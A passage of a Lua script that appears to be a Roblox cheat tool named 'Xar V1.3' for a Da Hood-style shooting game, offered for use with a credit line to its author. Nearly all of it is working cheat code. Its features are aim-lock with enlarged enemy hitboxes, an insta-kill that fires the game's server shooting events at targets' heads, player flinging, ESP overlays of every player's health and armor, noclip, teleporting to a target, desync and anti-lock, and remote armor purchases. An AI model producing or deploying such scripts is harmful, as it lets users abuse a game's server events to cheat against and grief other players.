						game.Players.LocalPlayer.PlayerGui:WaitForChild("XarGui1"):WaitForChild("ResolverSettings"):FindFirstChildOfClass("Frame"):WaitForChild("Keybind").Text
				end
			)
		end
	end
)

task.spawn(
	function()
		while task.wait(1) do
			task.spawn(
				function()
					FlingKey =
						game.Players.LocalPlayer.PlayerGui:WaitForChild("XarGui1"):WaitForChild("FlingSettings"):FindFirstChildOfClass("Frame"):WaitForChild("Keybind").Text
				end
			)
		end
	end
)

task.spawn(
	function()
		while task.wait(1) do
			task.spawn(
				function()
					ESPKey =
						game.Players.LocalPlayer.PlayerGui:WaitForChild("XarGui1"):WaitForChild("ESPSettings"):FindFirstChildOfClass("Frame"):WaitForChild("Keybind").Text
				end
			)
		end
	end
)

local function LockMethod(Method, Target)
	local Result
	task.spawn(
		function()
			if Method == "Velocity" then
				Result = Target.Position + Target.Velocity * Offset
			elseif Method == "MoveDirection" then
				Result = Target.Position + Vector3.new(0, 1, 0) + (Target.Parent.Humanoid.MoveDirection * Offset * Target.Parent.Humanoid.WalkSpeed)
			end
		end
	)
	return Result
end

--// Speed \--

UIS.InputBegan:Connect(
	function(Input, IsTyping)
		if IsTyping then
			return
		end
		if Input.KeyCode == Enum.KeyCode[SpeedKey] and Z_Active == false then
			task.spawn(function()
				Z_Active = true
				task.spawn(function()
					while task.wait() do
						if Z_Active == true then
							Player.Character.HumanoidRootPart.CFrame = Player.Character.HumanoidRootPart.CFrame + (Player.Character.Humanoid.MoveDirection * (Speed))
						else
							return
						end
					end
				end)
			end)
		elseif Input.KeyCode == Enum.KeyCode[SpeedKey] and Z_Active == true then
			Z_Active = false
		end
	end
)

--// Soft-Aim \--

UIS.InputBegan:Connect(
	function(Input, IsTyping)
		if IsTyping then
			return
		end
		if Input.KeyCode == Enum.KeyCode[CamKey] then
			if X_Active == false then
				X_Active = true
				local nearestTarget = ""
				local nearestDistance = math.huge

				local Max_Distance = 125
				for i, v in ipairs(game.Players:GetPlayers()) do
					if
						v ~= Player and v.Character and v.Character:FindFirstChild("Humanoid") and
						v.Character:FindFirstChild("Humanoid").Health ~= 0
					then
						if
							v.Character:FindFirstChild("BodyEffects") ~= nil and
							v.Character.BodyEffects:FindFirstChild("K.O") ~= nil and
							v.Character.BodyEffects["K.O"].Value ~= true
						then
							if v.Character:FindFirstChild("HumanoidRootPart") then
								local TargetHRP = v.Character.HumanoidRootPart
								local mag = (Mouse.Hit.Position - TargetHRP.Position).magnitude
								if mag < nearestDistance and mag <= Max_Distance then
									nearestDistance = mag
									nearestTarget = v
								end
							end
						end
					end
				end
				if nearestTarget == "" or nearestTarget == Player then
					return
				end
				lastTarget = nearestTarget
                nearestTarget.Character.HumanoidRootPart.Size = Vector3.new(15,8,10)
				while task.wait() do
					if X_Active == true then
						pcall(
							function()
								local part = nearestTarget.Character.HumanoidRootPart
                                nearestTarget.Character.HumanoidRootPart.CanCollide = false
								if U_Active == false then
									local Calculated_Offset = LockMethod("Velocity", part)
									workspace.CurrentCamera.CFrame = CFrame.new(workspace.CurrentCamera.CFrame.Position, Calculated_Offset)
								else
									local Calculated_Offset = LockMethod("MoveDirection", part)
									workspace.CurrentCamera.CFrame = CFrame.new(workspace.CurrentCamera.CFrame.Position, Calculated_Offset)
								end
							end
						)
					else
                    nearestTarget.Character.HumanoidRootPart.Size = Vector3.new(2,2,1)
						return
					end
				end
			elseif X_Active == true then
				X_Active = false
			end
		end
	end
)

--// Insta-Kill Toggle \--

UIS.InputBegan:Connect(function(Input, IsTyping)
	if IsTyping then
		return
	end
    if Input.KeyCode == Enum.KeyCode.J then
        J_Active = not J_Active
        game.StarterGui:SetCore(
            "SendNotification",
            {
                Title = "Xar | Insta-Kill Toggle",
                Text = tostring(J_Active)
            }
        )
    end
end)

--// Orbit \\--

UIS.InputBegan:Connect(
	function(Input, IsTyping)
		if IsTyping then
			return
		end
		if Input.KeyCode == Enum.KeyCode[OrbitKey] then
			if V_Active == false then
				V_Active = true

                    -- NORMAL VERSION
                    local nearestTarget = ""
                    local nearestDistance = math.huge
    
                    local Max_Distance = math.huge
                    for i, v in ipairs(game.Players:GetPlayers()) do
                        if
                            v ~= Player and v.Character and v.Character:FindFirstChild("Humanoid") and
                            v.Character:FindFirstChild("Humanoid").Health ~= 0
                        then
                            if
                                v.Character:FindFirstChild("BodyEffects") ~= nil and
                                v.Character.BodyEffects:FindFirstChild("K.O") ~= nil and
                                v.Character.BodyEffects["K.O"].Value ~= true
                            then
                                local TargetHRP = v.Character.HumanoidRootPart
                                local mag = (Mouse.Hit.Position - TargetHRP.Position).magnitude
                                if mag < nearestDistance and mag <= Max_Distance then
                                    nearestDistance = mag
                                    nearestTarget = v
                                end
                            end
                        end
                    end
                    if nearestTarget == "" or nearestTarget == Player then
                        return
                    end
                    lastTarget = nearestTarget
                    pcall(
                        function()
                            local center = nearestTarget.Character.HumanoidRootPart
                            local planet = Player.Character.HumanoidRootPart
                            local ORBIT_TIME = .1
                            local RADIUS = 5
                            local ECLIPSE = 1
                            local ROTATION = CFrame.Angles(0, 0, 0)
                            local sin, cos = math.sin, math.cos
                            local ROTSPEED = math.pi * 2 / ORBIT_TIME
                            ECLIPSE = ECLIPSE * RADIUS
                            local rot = 0
                            nearestTarget.Character.HumanoidRootPart.Size = Vector3.new(35,38,35)
                            --nearestTarget.Character.HumanoidRootPart.Transparency = 1
                            nearestTarget.Character.HumanoidRootPart.CanCollide = false
                            game:GetService("RunService").Stepped:connect(
                            function(t, dt)
                                if V_Active == false then
                                    planet = nil
                                    center = nil
                                    if nearestTarget ~= nil and nearestTarget.Character ~= nil and nearestTarget.Character.HumanoidRootPart ~= nil then
                                    nearestTarget.Character:WaitForChild('HumanoidRootPart').Size = Vector3.new(2,2,1)
                                    end
                                    nearestTarget = ""
                                    return
                                else
                                    nearestTarget.Character.HumanoidRootPart.CanCollide = false
                                    rot = rot + dt * ROTSPEED
                                    planet.CFrame =
                                        ROTATION * CFrame.new(sin(rot) * ECLIPSE, Height, cos(rot) * RADIUS) +
                                        center.Position

                                        task.spawn(function()
                                            if J_Active == true then
                                            task.wait(.5)
    
                                            local Target = nearestTarget.Character
    
                                            local args = {
                                                [1] = "Shoot"
                                            }
                                        
                                            game:GetService("Players").LocalPlayer.Character:FindFirstChildOfClass("Tool").RemoteEvent:FireServer(unpack(args))
                                        
                                            local args = {
                                                [1] = "ShootGun",
                                                [2] = game:GetService("Players").LocalPlayer.Character:FindFirstChildOfClass("Tool").Handle,
                                                [3] = game:GetService("Players").LocalPlayer.Character:FindFirstChildOfClass("Tool").Handle.Position,
                                                [4] = Target.Head.Position,
                                                [5] = Target.Head,
                                                [6] = Vector3.new(0, 1, 0)
                                            }
                                        
                                            game:GetService("ReplicatedStorage").MainEvent:FireServer(unpack(args))
                                        
                                            game:GetService("Players").LocalPlayer.Backpack:FindFirstChild("[Revolver]").RemoteEvent:FireServer()
                                        end
                                        end)
                                end
                            end
                            )
                        end
                    )
                    while task.wait() do
                        if V_Active == true then
                            pcall(
                                function()
                                    local part = nearestTarget.Character.HumanoidRootPart
                                    if U_Active == false then
                                        local Calculated_Offset = LockMethod("Velocity", part)
                                        workspace.CurrentCamera.CFrame = CFrame.new(workspace.CurrentCamera.CFrame.Position, Calculated_Offset)
                                    else
                                        local Calculated_Offset = LockMethod("MoveDirection", part)
                                        workspace.CurrentCamera.CFrame = CFrame.new(workspace.CurrentCamera.CFrame.Position, Calculated_Offset)
                                    end
                                end
                            )
                        else
                            return
                        end
                    end
			elseif V_Active == true then
				V_Active = false
			end
		end
	end
)

--// TP \\--

UIS.InputBegan:Connect(
	function(Input, IsTyping)
		if IsTyping then
			return
		end
		if Input.KeyCode == Enum.KeyCode.T then
			Player.Character.HumanoidRootPart.CFrame =
				lastTarget.Character.HumanoidRootPart.CFrame * CFrame.new(0, 3, 1.75)
		end
	end
)

--// CFrame Desync \\--

UIS.InputBegan:Connect(function(Input,IsTyping)
	if IsTyping then
		return
	end
	if Input.KeyCode == Enum.KeyCode[CFrmDesyncKey] and B_Active == false then 
		B_Active = true
        game.StarterGui:SetCore(
            "SendNotification",
            {
                Title = "Xar | CFrame Desync",
                Text = tostring(B_Active)
            }
        )
		local Part
		task.spawn(function()
			Part = Instance.new("Part")
			Part.Name = "DesyncPart"
			Part.CanCollide = false
			Part.Anchored = true
			Part.Transparency = .75
			Part.Size = Vector3.new(1,1,1)
			task.spawn(function()
				while task.wait(.1) do
					if B_Active == false then break end
					Part.BrickColor = BrickColor.new("Really red")
				end
			end)
		end)
		task.wait()
		workspace.CurrentCamera.CameraSubject = Part
		task.spawn(function()
			game:GetService('RunService').Heartbeat:Connect(function()
				if B_Active ~= true then return end
				local LocalPlayer = Player
				local OldPos = LocalPlayer.Character.HumanoidRootPart.CFrame
				local Origin = LocalPlayer.Character.HumanoidRootPart
				local randomRange = Radius
				LocalPlayer.Character.HumanoidRootPart.CFrame = (CFrame.new(Origin.Position) + Vector3.new(math.random(-randomRange, randomRange), math.random(-randomRange, randomRange), math.random(-randomRange, randomRange))) * CFrame.Angles(math.rad(math.random(-180, 180)), math.rad(math.random(-180, 180)), math.rad(math.random(-180, 180)))
				game:GetService("RunService").RenderStepped:Wait()
				LocalPlayer.Character.HumanoidRootPart.CFrame = OldPos
				Part.CFrame = OldPos * CFrame.new(0,3,0)
			end)
		end)
	elseif Input.KeyCode == Enum.KeyCode[CFrmDesyncKey] and B_Active == true then
		B_Active = false
        game.StarterGui:SetCore(
            "SendNotification",
            {
                Title = "Xar | CFrame Desync",
                Text = tostring(B_Active)
            }
        )
		workspace:FindFirstChild("DesyncPart"):Destroy()
	end
end)

--// Anti-Lock \\--

UIS.InputBegan:Connect(
	function(Input, IsTyping)
		if IsTyping then
			return
		end
		if Input.KeyCode == Enum.KeyCode[AntiKey] then
			if Y_Active == false then
				Y_Active = true
				task.spawn(
					function()
						game.StarterGui:SetCore(
							"SendNotification",
							{
								Title = "Xar | Anti-Lock",
								Text = "On"
							}
						)
					end
				)
				task.spawn(
					function()
						game:GetService("RunService").heartbeat:Connect(
						function()
							if Y_Active == false then
								return
							end
							if Y_Active == true then
								local RootPart = Player.Character.HumanoidRootPart
								local Velocity = RootPart.Velocity
								RootPart.Velocity = Vector3.new(Velocity.X, 9e9, Velocity.Z)
								game:GetService("RunService").RenderStepped:Wait()
								RootPart.Velocity = Velocity
							end
						end
						)
					end
				)
			elseif Y_Active == true then
				task.spawn(
					function()
						game.StarterGui:SetCore(
							"SendNotification",
							{
								Title = "Xar | Anti-Lock",
								Text = "Off"
							}
						)
					end
				)
				Y_Active = false
			end
		end
	end
)

--// Resolver \\--

UIS.InputBegan:Connect(function(Input, IsTyping)
		if IsTyping then
			return
		end
		if Input.KeyCode == Enum.KeyCode[ResolverKey] then
			if U_Active == false then
				U_Active = true
				task.spawn(
					function()
						game.StarterGui:SetCore(
							"SendNotification",
							{
								Title = "Xar | Resolver",
								Text = "On"
							}
						)
					end
				)
			elseif U_Active == true then
				task.spawn(
					function()
						game.StarterGui:SetCore(
							"SendNotification",
							{
								Title = "Xar | Resolver",
								Text = "Off"
							}
						)
					end
				)
				U_Active = false
			end
		end
	end)

--// ESP \\--

UIS.InputBegan:Connect(
	function(Input, IsTyping)
		if IsTyping then
			return
		end
		if Input.KeyCode == Enum.KeyCode[ESPKey] then
			if L_Active == false then
				L_Active = true
				task.spawn(
					function()
						for i, v in next, game:GetService("Players"):GetPlayers() do
							if v ~= Player and v.Character ~= nil then
								task.spawn(
									function()
										if L_Active ~= true then
											return
										end

										task.spawn(
											function()
												task.wait()
												local Plr = v
												local humanoidRootPart = v.Character:WaitForChild("HumanoidRootPart")

												--// 1 \\--

												local billboardGui = Instance.new("BillboardGui")
												billboardGui.MaxDistance = 1500
												billboardGui.Name = "XarESP"
												billboardGui.AlwaysOnTop = true
												billboardGui.Size = UDim2.new(0, 100, 0, 50)
												billboardGui.StudsOffset = Vector3.new(0, 4, 0)
												billboardGui.Parent = humanoidRootPart

												local textLabel = Instance.new("TextLabel")
												textLabel.TextWrapped = false
												textLabel.Parent = billboardGui
												textLabel.Size = UDim2.new(1, 0, 1, 0)
												textLabel.BackgroundTransparency = 1
												textLabel.TextColor3 = Color3.new(1, 1, 1)
												textLabel.TextStrokeTransparency = 0.5
												textLabel.TextStrokeColor3 = Color3.new(0, 0, 0)
												textLabel.Font = Enum.Font.SourceSansBold
												textLabel.TextScaled = true
												textLabel.Text = Plr.Name

												--// 2 \\--

												local billboardGui2 = Instance.new("BillboardGui")
												billboardGui2.MaxDistance = 50
												billboardGui2.Name = "XarESP2"
												billboardGui2.AlwaysOnTop = true
												billboardGui2.Size = UDim2.new(0, 100, 0, 50)
												billboardGui2.StudsOffset = Vector3.new(0, 3.5, 0)
												billboardGui2.Parent = humanoidRootPart

												local textLabel2 = Instance.new("TextLabel")
												textLabel2.TextWrapped = false
												textLabel2.Parent = billboardGui2
												textLabel2.Size = UDim2.new(1, 0, 1, 0)
												textLabel2.BackgroundTransparency = 1
												textLabel2.TextColor3 = Color3.new(1, 1, 1)
												textLabel2.TextStrokeTransparency = 0.5
												textLabel2.TextStrokeColor3 = Color3.new(0, 0, 0)
												textLabel2.Font = Enum.Font.SourceSansBold
												textLabel2.TextSize = 20

												task.spawn(
													function()
														while task.wait(.1) do
															if L_Active ~= true then
																break
															end
															textLabel2.Text =
																"Health: " .. Plr.Character.Humanoid.Health
														end
													end
												)

												--// 3 \\--

												local billboardGui3 = Instance.new("BillboardGui")
												billboardGui3.MaxDistance = 50
												billboardGui3.Name = "XarESP3"
												billboardGui3.AlwaysOnTop = true
												billboardGui3.Size = UDim2.new(0, 100, 0, 50)
												billboardGui3.StudsOffset = Vector3.new(0, 3.25, 0)
												billboardGui3.Parent = humanoidRootPart

												local textLabel3 = Instance.new("TextLabel")
												textLabel3.TextWrapped = false
												textLabel3.Parent = billboardGui3
												textLabel3.Size = UDim2.new(1, 0, 1, 0)
												textLabel3.BackgroundTransparency = 1
												textLabel3.TextColor3 = Color3.new(1, 1, 1)
												textLabel3.TextStrokeTransparency = 0.5
												textLabel3.TextStrokeColor3 = Color3.new(0, 0, 0)
												textLabel3.Font = Enum.Font.SourceSansBold
												textLabel3.TextSize = 20

												task.spawn(
													function()
														while task.wait(.1) do
															if L_Active ~= true then
																break
															end
															textLabel3.Text =
																"Armor: " ..
																tostring(Plr.Character.BodyEffects.Armor.Value)
														end
													end
												)
											end
										)
										local Highlight = Instance.new("Highlight", v.Character)
									end
								)
								task.spawn(
									function()
										v.CharacterAdded:Connect(
											function(Char)
												if L_Active ~= true then
													return
												end
												task.spawn(
													function()
														task.wait(3.5)
														local Highlight = Instance.new("Highlight", Char)
														local Plr = v
														local humanoidRootPart = Char:WaitForChild("HumanoidRootPart")

														--// 1 \\--

														local billboardGui = Instance.new("BillboardGui")
														billboardGui.MaxDistance = 1500
														billboardGui.Name = "XarESP"
														billboardGui.AlwaysOnTop = true
														billboardGui.Size = UDim2.new(0, 100, 0, 50)
														billboardGui.StudsOffset = Vector3.new(0, 4, 0)
														billboardGui.Parent = humanoidRootPart

														local textLabel = Instance.new("TextLabel")
														textLabel.TextWrapped = false
														textLabel.Parent = billboardGui
														textLabel.Size = UDim2.new(1, 0, 1, 0)
														textLabel.BackgroundTransparency = 1
														textLabel.TextColor3 = Color3.new(1, 1, 1)
														textLabel.TextStrokeTransparency = 0.5
														textLabel.TextStrokeColor3 = Color3.new(0, 0, 0)
														textLabel.Font = Enum.Font.SourceSansBold
														textLabel.TextScaled = true
														textLabel.Text = Plr.Name

														--// 2 \\--

														local billboardGui2 = Instance.new("BillboardGui")
														billboardGui2.MaxDistance = 50
														billboardGui2.Name = "XarESP2"
														billboardGui2.AlwaysOnTop = true
														billboardGui2.Size = UDim2.new(0, 100, 0, 50)
														billboardGui2.StudsOffset = Vector3.new(0, 3.5, 0)
														billboardGui2.Parent = humanoidRootPart

														local textLabel2 = Instance.new("TextLabel")
														textLabel2.TextWrapped = false
														textLabel2.Parent = billboardGui2
														textLabel2.Size = UDim2.new(1, 0, 1, 0)
														textLabel2.BackgroundTransparency = 1
														textLabel2.TextColor3 = Color3.new(1, 1, 1)
														textLabel2.TextStrokeTransparency = 0.5
														textLabel2.TextStrokeColor3 = Color3.new(0, 0, 0)
														textLabel2.Font = Enum.Font.SourceSansBold
														textLabel2.TextSize = 20

														task.spawn(
															function()
																while task.wait(.1) do
																	if L_Active ~= true then
																		break
																	end
																	textLabel2.Text =
																		"Health: " .. Plr.Character.Humanoid.Health
																end
															end
														)

														--// 3 \\--

														local billboardGui3 = Instance.new("BillboardGui")
														billboardGui3.MaxDistance = 50
														billboardGui3.Name = "XarESP3"
														billboardGui3.AlwaysOnTop = true
														billboardGui3.Size = UDim2.new(0, 100, 0, 50)
														billboardGui3.StudsOffset = Vector3.new(0, 3.25, 0)
														billboardGui3.Parent = humanoidRootPart

														local textLabel3 = Instance.new("TextLabel")
														textLabel3.TextWrapped = false
														textLabel3.Parent = billboardGui3
														textLabel3.Size = UDim2.new(1, 0, 1, 0)
														textLabel3.BackgroundTransparency = 1
														textLabel3.TextColor3 = Color3.new(1, 1, 1)
														textLabel3.TextStrokeTransparency = 0.5
														textLabel3.TextStrokeColor3 = Color3.new(0, 0, 0)
														textLabel3.Font = Enum.Font.SourceSansBold
														textLabel3.TextSize = 20

														task.spawn(
															function()
																while task.wait(.1) do
																	if L_Active ~= true then
																		break
																	end
																	textLabel3.Text =
																		"Armor: " ..
																		tostring(Plr.Character.BodyEffects.Armor.Value)
																end
															end
														)
													end
												)
												local Highlight = Instance.new("Highlight", Char)
											end
										)
									end
								)
							end
						end
					end
				)
				task.spawn(
					function()
						game:GetService("Players").PlayerAdded:Connect(
						function(Plr)
							if L_Active ~= true then
								return
							end
							task.spawn(
								function()
									local Char = Plr.CharacterAdded:Wait()
									task.spawn(
										function()
											task.wait(3)
											local Highlight = Instance.new("Highlight", Char)
											local humanoidRootPart = Plr.Character:WaitForChild("HumanoidRootPart")

											--// 1 \\--

											local billboardGui = Instance.new("BillboardGui")
											billboardGui.MaxDistance = 1500
											billboardGui.Name = "XarESP"
											billboardGui.AlwaysOnTop = true
											billboardGui.Size = UDim2.new(0, 100, 0, 50)
											billboardGui.StudsOffset = Vector3.new(0, 4, 0)
											billboardGui.Parent = humanoidRootPart

											local textLabel = Instance.new("TextLabel")
											textLabel.TextWrapped = false
											textLabel.Parent = billboardGui
											textLabel.Size = UDim2.new(1, 0, 1, 0)
											textLabel.BackgroundTransparency = 1
											textLabel.TextColor3 = Color3.new(1, 1, 1)
											textLabel.TextStrokeTransparency = 0.5
											textLabel.TextStrokeColor3 = Color3.new(0, 0, 0)
											textLabel.Font = Enum.Font.SourceSansBold
											textLabel.TextScaled = true
											textLabel.Text = Plr.Name

											--// 2 \\--

											local billboardGui2 = Instance.new("BillboardGui")
											billboardGui2.MaxDistance = 50
											billboardGui2.Name = "XarESP2"
											billboardGui2.AlwaysOnTop = true
											billboardGui2.Size = UDim2.new(0, 100, 0, 50)
											billboardGui2.StudsOffset = Vector3.new(0, 3.5, 0)
											billboardGui2.Parent = humanoidRootPart

											local textLabel2 = Instance.new("TextLabel")
											textLabel2.TextWrapped = false
											textLabel2.Parent = billboardGui2
											textLabel2.Size = UDim2.new(1, 0, 1, 0)
											textLabel2.BackgroundTransparency = 1
											textLabel2.TextColor3 = Color3.new(1, 1, 1)
											textLabel2.TextStrokeTransparency = 0.5
											textLabel2.TextStrokeColor3 = Color3.new(0, 0, 0)
											textLabel2.Font = Enum.Font.SourceSansBold
											textLabel2.TextSize = 20

											task.spawn(
												function()
													while task.wait(.1) do
														if L_Active ~= true then
															break
														end
														textLabel2.Text =
															"Health: " .. Plr.Character.Humanoid.Health
													end
												end
											)

											--// 3 \\--

											local billboardGui3 = Instance.new("BillboardGui")
											billboardGui3.MaxDistance = 50
											billboardGui3.Name = "XarESP3"
											billboardGui3.AlwaysOnTop = true
											billboardGui3.Size = UDim2.new(0, 100, 0, 50)
											billboardGui3.StudsOffset = Vector3.new(0, 3.25, 0)
											billboardGui3.Parent = humanoidRootPart

											local textLabel3 = Instance.new("TextLabel")
											textLabel3.TextWrapped = false
											textLabel3.Parent = billboardGui3
											textLabel3.Size = UDim2.new(1, 0, 1, 0)
											textLabel3.BackgroundTransparency = 1
											textLabel3.TextColor3 = Color3.new(1, 1, 1)
											textLabel3.TextStrokeTransparency = 0.5
											textLabel3.TextStrokeColor3 = Color3.new(0, 0, 0)
											textLabel3.Font = Enum.Font.SourceSansBold
											textLabel3.TextSize = 20

											task.spawn(
												function()
													while task.wait(.1) do
														if L_Active ~= true then
															break
														end
														textLabel3.Text =
															"Armor: " ..
															tostring(Plr.Character.BodyEffects.Armor.Value)
													end
												end
											)
										end
									)
									Plr.CharacterAdded:Connect(
										function(Char)
											if L_Active ~= true then
												return
											end
											task.wait(3)
											local Highlight = Instance.new("Highlight", Char)
											local humanoidRootPart = Char:WaitForChild("HumanoidRootPart")

											--// 1 \\--

											local billboardGui = Instance.new("BillboardGui")
											billboardGui.MaxDistance = 1500
											billboardGui.Name = "XarESP"
											billboardGui.AlwaysOnTop = true
											billboardGui.Size = UDim2.new(0, 100, 0, 50)
											billboardGui.StudsOffset = Vector3.new(0, 4, 0)
											billboardGui.Parent = humanoidRootPart

											local textLabel = Instance.new("TextLabel")
											textLabel.TextWrapped = false
											textLabel.Parent = billboardGui
											textLabel.Size = UDim2.new(1, 0, 1, 0)
											textLabel.BackgroundTransparency = 1
											textLabel.TextColor3 = Color3.new(1, 1, 1)
											textLabel.TextStrokeTransparency = 0.5
											textLabel.TextStrokeColor3 = Color3.new(0, 0, 0)
											textLabel.Font = Enum.Font.SourceSansBold
											textLabel.TextScaled = true
											textLabel.Text = Plr.Name

											--// 2 \\--

											local billboardGui2 = Instance.new("BillboardGui")
											billboardGui2.MaxDistance = 50
											billboardGui2.Name = "XarESP2"
											billboardGui2.AlwaysOnTop = true
											billboardGui2.Size = UDim2.new(0, 100, 0, 50)
											billboardGui2.StudsOffset = Vector3.new(0, 3.5, 0)
											billboardGui2.Parent = humanoidRootPart

											local textLabel2 = Instance.new("TextLabel")
											textLabel2.TextWrapped = false
											textLabel2.Parent = billboardGui2
											textLabel2.Size = UDim2.new(1, 0, 1, 0)
											textLabel2.BackgroundTransparency = 1
											textLabel2.TextColor3 = Color3.new(1, 1, 1)
											textLabel2.TextStrokeTransparency = 0.5
											textLabel2.TextStrokeColor3 = Color3.new(0, 0, 0)
											textLabel2.Font = Enum.Font.SourceSansBold
											textLabel2.TextSize = 20

											task.spawn(
												function()
													while task.wait(.1) do
														if L_Active ~= true then
															break
														end
														textLabel2.Text =
															"Health: " .. Plr.Character.Humanoid.Health
													end
												end
											)

											--// 3 \\--

											local billboardGui3 = Instance.new("BillboardGui")
											billboardGui3.MaxDistance = 50
											billboardGui3.Name = "XarESP3"
											billboardGui3.AlwaysOnTop = true
											billboardGui3.Size = UDim2.new(0, 100, 0, 50)
											billboardGui3.StudsOffset = Vector3.new(0, 3.25, 0)
											billboardGui3.Parent = humanoidRootPart

											local textLabel3 = Instance.new("TextLabel")
											textLabel3.TextWrapped = false
											textLabel3.Parent = billboardGui3
											textLabel3.Size = UDim2.new(1, 0, 1, 0)
											textLabel3.BackgroundTransparency = 1
											textLabel3.TextColor3 = Color3.new(1, 1, 1)
											textLabel3.TextStrokeTransparency = 0.5
											textLabel3.TextStrokeColor3 = Color3.new(0, 0, 0)
											textLabel3.Font = Enum.Font.SourceSansBold
											textLabel3.TextSize = 20

											task.spawn(
												function()
													while task.wait(.1) do
														if L_Active ~= true then
															break
														end
														textLabel3.Text =
															"Armor: " ..
															tostring(Plr.Character.BodyEffects.Armor.Value)
													end
												end
											)
										end
									)
								end
							)
						end
						)
					end
				)
			else
				L_Active = false
				task.spawn(
					function()
						for i, v in next, game:GetService("Players"):GetPlayers() do
							if v ~= Player then
								task.spawn(
									function()
										if v.Character then
											if v.Character:FindFirstChild("Highlight") then
												task.spawn(
													function()
														for i, v in next, v.Character:GetDescendants() do
															if v:IsA("BillboardGui") then
																v:Destroy()
															end
														end
													end
												)
												for i, v in next, v.Character:GetChildren() do
													if v:IsA("Highlight") then
														v:Destroy()
													end
												end
											end
										else
											v.CharactedAdded:Wait()
											if v.Character:FindFirstChild("Highlight") then
												task.spawn(
													function()
														task.spawn(
															function()
																for i, v in next, v.Character:GetDescendants() do
																	if v:IsA("BillboardGui") then
																		v:Destroy()
																	end
																end
															end
														)
														for i, v in next, v.Character:GetChildren() do
															if v:IsA("Highlight") then
																v:Destroy()
															end
														end
													end
												)
											end
										end
									end
								)
							end
						end
					end
				)
			end
		end
	end
)

--// Fling \\--

UIS.InputBegan:Connect(
	function(Input, IsTyping)
		if IsTyping then
			return
		end
		if Input.KeyCode == Enum.KeyCode[FlingKey] then
			task.spawn(
				function()
					local nearestTarget = ""
					local nearestDistance = math.huge

					local Max_Distance = 75
					for i, v in ipairs(game.Players:GetPlayers()) do
						if
							v ~= Player and v.Character and v.Character:FindFirstChild("Humanoid") and
							v.Character:FindFirstChild("Humanoid").Health ~= 0
						then
							local TargetHRP = v.Character.HumanoidRootPart
							local mag = (Mouse.Hit.Position - TargetHRP.Position).magnitude
							if mag < nearestDistance and mag <= Max_Distance then
								nearestDistance = mag
								nearestTarget = v
							end
						end
					end
					if nearestTarget == "" or nearestTarget == Player then
						return
					end
					lastTarget = nearestTarget
					task.spawn(
						function()
							local Target = nearestTarget
							task.wait()
							local cfrm = Player.Character.HumanoidRootPart.CFrame
							task.wait()
							local vel = .625
							for count = 0, 25, 1 do
								task.wait()
								local FlingTorso = Target.Character.HumanoidRootPart
								Player.Character.HumanoidRootPart.CFrame =
									CFrame.new(FlingTorso.Position + FlingTorso.Velocity * vel)
								Player.Character.HumanoidRootPart.Velocity = Vector3.new(7500, 7500, 7500)
								task.spawn(
									function()
										task.wait()
										Player.Character.HumanoidRootPart.CFrame = cfrm
									end
								)
							end
							for count = 0, 100, 1 do
								Player.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.Ragdoll, false)
								Player.Character.PrimaryPart.Velocity = Vector3.new(0, 0, 0)
								Player.Character.PrimaryPart.RotVelocity = Vector3.new(0, 0, 0)
								Player.Character.HumanoidRootPart.AssemblyLinearVelocity = Vector3.new(0, 0, 0)
								Player.Character.HumanoidRootPart.Velocity = Vector3.new(0, 0, 0)
								Player.Character.HumanoidRootPart.RotVelocity = Vector3.new(0, 0, 0)
								Player.Character.HumanoidRootPart.AssemblyLinearVelocity = Vector3.new(0, 0, 0)
								Player.Character.HumanoidRootPart.CFrame =
									cfrm * CFrame.Angles(math.rad(0), math.rad(137.92), math.rad(0))
							end
						end
					)
				end
			)
		end
	end
)

--// Noclip \\--

local NoclipTable = {}

UIS.InputBegan:Connect(
	function(Input, IsTyping)
		if IsTyping then
			return
		end
		if Input.KeyCode == Enum.KeyCode.N then
			if N_Active == false then
				task.spawn(
					function()
						game.StarterGui:SetCore(
							"SendNotification",
							{
								Title = "Xar | Noclip",
								Text = "On"
							}
						)
					end
				)
				N_Active = true
				for i, v in next, Player.Character:GetChildren() do
					if v:IsA("BasePart") or v:IsA("Part") and v.CanCollide == true then
						table.insert(NoclipTable, v.Name)
						task.spawn(
							function()
								while task.wait() do
									if N_Active ~= true then
										break
									end
									v.CanCollide = false
								end
							end
						)
					elseif v:IsA("Accessory") then
						task.spawn(
							function()
								while task.wait() do
									if N_Active ~= true then
										break
									end
									v.Handle.CanCollide = false
								end
							end
						)
					end
				end
			else
				task.spawn(
					function()
						game.StarterGui:SetCore(
							"SendNotification",
							{
								Title = "Xar | Noclip",
								Text = "Off"
							}
						)
					end
				)
				N_Active = false
				for i, v in next, Player.Character:GetChildren() do
					if v:IsA("BasePart") or v:IsA("Part") and not table.find(NoclipTable, v.Name) then
						task.spawn(
							function()
								v.CanCollide = true
							end
						)
					elseif v:IsA("Accessory") then
						task.spawn(
							function()
								v.Handle.CanCollide = true
							end
						)
					end
				end
			end
		end
	end
)

--// Buy-Armor \\--

UIS.InputBegan:Connect(function(Input, IsTyping)
    if IsTyping then
        return
    end
    if Input.KeyCode == Enum.KeyCode.LeftAlt then
        pcall(function()
            local old_cfrm = Player.Character:WaitForChild("HumanoidRootPart").CFrame
            task.wait()
            Player.Character:WaitForChild("HumanoidRootPart").CFrame = workspace.Ignored.Shop['[High-Medium Armor] - $2440'].Head.CFrame
            task.wait(.25)
            fireclickdetector(workspace.Ignored.Shop['[High-Medium Armor] - $2440'].ClickDetector)
            task.wait(.1)
            Player.Character:WaitForChild("HumanoidRootPart").CFrame = old_cfrm
        end)
    end
end)

task.spawn(
	function()
		Player.Chatted:Connect(
			function(Message)
				if Message:lower() == "/e headless" then
					Player.Character.Head.Transparency = 1
					Player.Character.Head.face.Transparency = 1
				end
			end
		)
	end
)

task.spawn(function()
	game.StarterGui:SetCore("SendNotification", {
		Title = "Xar | V1.3",
		Text = "Xar was made by @x7ant | rblx/discord (P TO OPEN MENU)"
	})
	task.spawn(function()
		local wl = {"9hellz", "destinysmyforever", "5partz", "x1aznt", "destinystoy", "anthonysmyforever"}
		for i,v in next, game.Players:GetPlayers() do
			if table.find(wl, v.Name) then
				v.Character.Humanoid.DisplayName = "[🛡] "..v.Character.Humanoid.DisplayName
				v.CharacterAdded:Connect(function(Charr)
					Charr:WaitForChild("Humanoid").DisplayName = "[🛡] "..Charr.Humanoid.DisplayName
				end)
			end                     
		end
		game.Players.PlayerAdded:Connect(function(Playa)
			if table.find(wl, Playa.Name) then
				Playa.CharacterAdded:Connect(function(Charr)
					Charr:WaitForChild("Humanoid").DisplayName = "[🛡] "..Charr.Humanoid.DisplayName
				end)
			end
		end)
	end)
end)

